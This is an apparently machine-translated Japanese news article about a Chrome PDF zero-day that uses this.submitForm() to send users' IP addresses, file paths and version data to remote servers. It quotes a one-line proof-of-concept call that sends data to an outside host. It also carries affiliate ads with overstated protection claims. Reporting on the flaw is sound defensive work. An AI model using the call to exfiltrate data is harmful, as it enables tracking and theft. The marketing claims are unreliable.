- EdgeSpotは、ChromeのPDFドキュメントを悪用する興味深いゼロデイ脆弱性を発見しました。
- この 脆弱性 PCで機密データを収集することにより、害を及ぼす可能性があります。
- 私たちを探索する Web&クラウドページ 他のツールやサービスに関する詳細については。
- ブラウザに興味がある場合は、ブラウザに関する多くの情報を提供しています。 ブラウザハブ.
Adobe Acrobat Readerを使用して、すべてのドキュメントにアクセスして安全にします。 このドキュメント管理ツールを使用すると、電子署名して公式フォームを作成し、作業時間を節約することもできます。 PC用に入手すると、次のことができるようになります。
- すべてのPDFおよびその他のファイルタイプを開いて印刷し、編集します
- PDFフォームへの入力が簡単
- 重要なドキュメントを暗号化してください
すべてのアプリを特別価格で手に入れましょう!
世界のNr.1ドキュメント管理ソフトウェアが今ではお得な価格になっているので、急いでください!
エクスプロイト検出サービスEdgeSpotは、興味深いものを発見しました クロム PDFドキュメントを悪用するゼロデイ脆弱性。
この脆弱性により、攻撃者は次のことが可能になります。 機密データを収集する Chromeで開かれた悪意のあるPDFドキュメントを使用する。
被害者がGoogleChromeでそれぞれのPDFファイルを開くとすぐに、悪意のあるプログラムがユーザーデータを収集することでバックグラウンドで動作を開始します。
次に、データはハッカーによって制御されているリモートサーバーに転送されます。 攻撃者はどのデータを吸い込んでいるのか疑問に思われるかもしれません。攻撃者はPC上の次のデータを標的にしています。
- IPアドレス
- システム上のPDFファイルのフルパス
- OSとChromeのバージョン
マルウェアに感染したPDFファイルに注意してください
専門家 斑点 2つのドメインのうちの1つ readnotify [。] com または burpcollaborator [。] net データを受信していました。
彼らは、攻撃者がを使用していることを明らかにしました this.submitForm() ユーザーの機密情報を収集するためのPDFJavascriptAPI。
最小限のPoC、次のような単純なAPI呼び出しでテストしました this.submitForm( ‘ http://google.com/test’) GoogleChromeに個人データをgoogle.comに送信させます。
このChromeのバグは、悪意のあるPDFファイルの2つの異なるセットによって悪用されていました。どちらも、それぞれ2017年10月と2018年9月に配布されました。
特に、収集されたデータは、攻撃者が将来攻撃を微調整するために使用する可能性があります。 レポートによると、ファイルの最初のバッチは、ReadNotifyのPDF追跡サービスを使用してコンパイルされました。
ユーザーはこのサービスを利用して、ユーザーの意見を追跡できます。 EdgeSpotは、PDFファイルの2番目のセットの性質に関する詳細を共有していません。
クイックヒント:ブラウザをOperaに変更します
このような困難な時期に、私たちはあらゆる段階でマルウェア、フィッシング、トロイの木馬に襲われているため、より警戒し、保護された状態を維持する必要があります。
これはChromeに固有の問題であるため、次のようなセキュリティ指向のブラウザを使用すると、その脅威や他のすべての脅威を回避できます。 オペラ.
このブラウザには、そのような気を散らすものを取り除くだけでなく、ブロックする広告ブロッカーが組み込まれています 分析スクリプト、トラッキングピクセル、およびデータを収集する方法。
また、危険を回避することを絶対に確実にしたい場合は、組み込みの背後に移動してください VPN 100%無料で無制限に利用できるサービス。
オペラ
Operaは、組み込みの広告ブロッカーとVPNサービスを無料で提供し、完璧な脅威からの保護を提供します。
ウェブサイトを訪問
PDFの脆弱性から保護するにはどうすればよいですか?
Adobe AcrobatPROをダウンロードする
PDFファイルの処理に関しては、AdobeとChromeがよく一致します。 Chrome用のAdobeExtensionをインストールすることで、お気に入りのブラウザを離れることなく、PDFを好みに合わせて確認および操作できます。
堅牢な構造にもかかわらず、標準バージョンのReaderを使用している場合、PDFファイルに隠されたマルウェアが検出されない可能性があります。
保護を保証し、データをハッカーから遠ざけるために、プロフェッショナルバージョンをお勧めします。
無料ではありませんが、PDFファイルのセキュリティの強化など、さまざまな追加機能を利用できるため、支払う価格はかなり低くなっています。
購入する前に完全なプロ体験を味わうことができるように、7日間の無料トライアルも含まれています。
Adobe Acrobat PRO
Adobe Acrobat PROをダウンロードして、マルウェアに近づかないでください。 無料版よりも多くの機能があり、データを安全に保ちます。
ウェブサイトを訪問
インターネットサーフィン中に安全を確保したい場合は、ネットワークを保護するための完全な専用ツールを入手する必要があります。 今すぐプライベートインターネットアクセスをインストールする そしてあなた自身を確保します。 これは、ブラウジング中の攻撃からPCを保護し、IPアドレスをマスクし、すべての不要なアクセスをブロックします。
エクスプロイト検出サービスのEdgeSpotは、パッチが近い将来リリースされるとは予想されていなかったため、潜在的なリスクについてChromeユーザーに警告したいと考えていました。
EdgeSpotは昨年この脆弱性についてGoogleに報告し、同社は4月下旬にパッチをリリースすることを約束しました。
ただし、受信したPDFドキュメントを別のリーダーアプリを使用してローカルで表示することにより、問題の一時的な回避策を使用することを検討できます。
または、システムをインターネットから切断して、ChromeでPDFドキュメントを開くこともできます。
よくある質問
はい、そうです。 しかし、より幅広い選択肢が必要な場合は、 のための私たちのトップピックを探る クロムプライバシー の拡張機能 この完全なガイド.
Tここに許可する多くの拡張機能があります PDF 処理。 小切手 私たちの 優れたガイド Chromeに最適なPDF拡張機能について。
そうではありませんが、すぐにアクティブ化できます。 これが私たちの 包括的なガイド ChromeでQRコードジェネレーターを有効にする方法について。
